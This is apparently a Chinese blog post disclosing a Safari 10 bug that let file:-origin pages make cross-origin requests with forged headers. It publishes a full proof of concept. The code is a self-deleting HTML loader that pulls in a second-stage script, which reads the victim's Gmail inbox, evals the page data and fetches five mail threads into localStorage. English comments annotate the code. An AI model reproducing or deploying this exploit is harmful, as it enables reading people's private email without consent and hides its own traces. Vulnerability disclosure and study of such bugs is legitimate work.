safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置http_header 我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc 这是我在漏洞未修复前截的图:      这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码:
```html
<!-- jQuery is pulled from a third-party CDN; the second-stage script below relies on $.ajax. -->
<script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script>
<script id='test'>
// Base URL of the host that serves the second-stage script (get_gmail.js, listed below).
var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/'

// Removes this loader <script> (id 'test') from the DOM once it has run.
function deleteSelf(){
  let test = document.getElementById('test');
  test.parentNode.removeChild(test);
}

// src: URL of the PoC script; id: id given to the appended <script>, used to remove that element again.
function getPoc(src,id){
  let head = document.getElementsByTagName('HEAD').item(0);
  // NOTE: `script` is assigned without let/const, so it becomes an implicit global.
  script = document.createElement("script");
  script.type = "text/javascript";
  script.src = src;
  script.id = id;
  head.appendChild(script);
  // The tag is removed right after insertion, presumably to hide it; whether the
  // already-started load still executes is browser behaviour not established here.
  let test = document.getElementById(id);
  test.parentNode.removeChild(test);
}

// Gate: per the write-up, the bypass only applies to a document opened from file:
// (an opaque "null" origin) in Safari. The UA sniff excludes Chrome, whose UA
// string also contains "Safari". Either way the loader removes itself afterwards.
if('file:' == document.location.protocol
   && navigator.userAgent.toLowerCase().indexOf("safari")>-1
   && navigator.userAgent.toLowerCase().indexOf("chrome")<0){
  getPoc(server_address+"get_gmail.js","get_gmail");
  deleteSelf();
}
else{
  deleteSelf();
}
</script>
```
```javascript
// Despite its name, this does not contact a server: it stores the fetched
// Gmail response body in localStorage under an incrementing numeric key.
// No exfiltration step is part of this listing.
function send_to_server(data_sender){
  localStorage.setItem((++num).toString(),data_sender.responseText);
}

let num = 0;    // counter used as the localStorage key
let mail_list;  // thread list parsed out of the inbox HTML
let ik;         // per-account "ik" value parsed from GLOBALS; required by the per-thread URL below

// Cross-origin GET of the Gmail inbox page. 'Host' and 'Accept-Encoding' are
// forbidden request headers that browsers normally refuse to let script set;
// the write-up's claim is that Safari 10 accepted them from a null-origin page.
// The browser-side fix is to apply the same-origin policy to file: documents —
// there is nothing the target site can do about this request on its own.
let t = $.ajax({
  type: 'get',
  url: "https://mail.google.com/",
  //data: data,
  headers:{
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate, br',
    'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6',
    'Host':'mail.google.com'
  },
  // jQuery passes (data, textStatus, jqXHR); the callback ignores its parameters
  // and reads the response through the outer `t` handle instead.
  success: function(event,xhr,settings){
    // Extract the inline VIEW_DATA blob. NOTE: String.match() returns null when
    // the regex does not match, so the [1] index throws a TypeError and the
    // `!= null` check further down never sees that failure.
    mail_list = t.responseText.match(/var\sVIEW_DATA=(.*);\svar\sGM_TIMING_END_CHUNK2/)[1];
    // Group 11 is the quoted value after the GLOBALS=[...] prefix; same null-match caveat.
    ik = t.responseText.match(/(.*)var\sGLOBALS=\[(.*?),(.*?),\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",(.*?),\"(.*?)\"(.*)/)[11];
    if(mail_list != null){
      // eval() over text taken from a cross-origin response: the fetched blob is
      // executed as code rather than parsed as data.
      mail_list = eval(mail_list)[3][2];
      console.log(mail_list);
      // Only the first five entries are fetched; there is no bounds check against mail_list.length.
      for(let i = 0;i < 5;i++){
        let th = mail_list[i][0];  // thread id of the i-th inbox entry
        // POST for one thread's conversation view, copying the headers Gmail's own
        // XHR sends. 'Host', 'Connection', 'Content-Length', 'User-Agent',
        // 'Accept-Encoding' and 'Origin' are all forbidden request headers.
        let data_sender = $.ajax({
          type:'post',
          data:'',
          url:'https://mail.google.com/mail/?ik='+ik+'&view=cv&th='+th+'&prf=1&search=inbox',
          headers:{
            'Host': 'mail.google.com',
            'Connection': 'close',
            'Content-Length': '0',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
            'Accept': '*\/*',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
            'X-Same-Domain': '1',
            'Origin': 'https://mail.google.com',
            'X-Chrome-UMA-Enabled': '1',
          },
          // Parameters are ignored here too; the response is read via `data_sender`.
          success:function(event,xhr,settings){
            send_to_server(data_sender);
          }
        });
      }
      //*/
    }
    else{
      // Only reached if VIEW_DATA matched but captured nothing usable (see the match() note above).
      console.log('get mail_list error');
    }
  }
});
```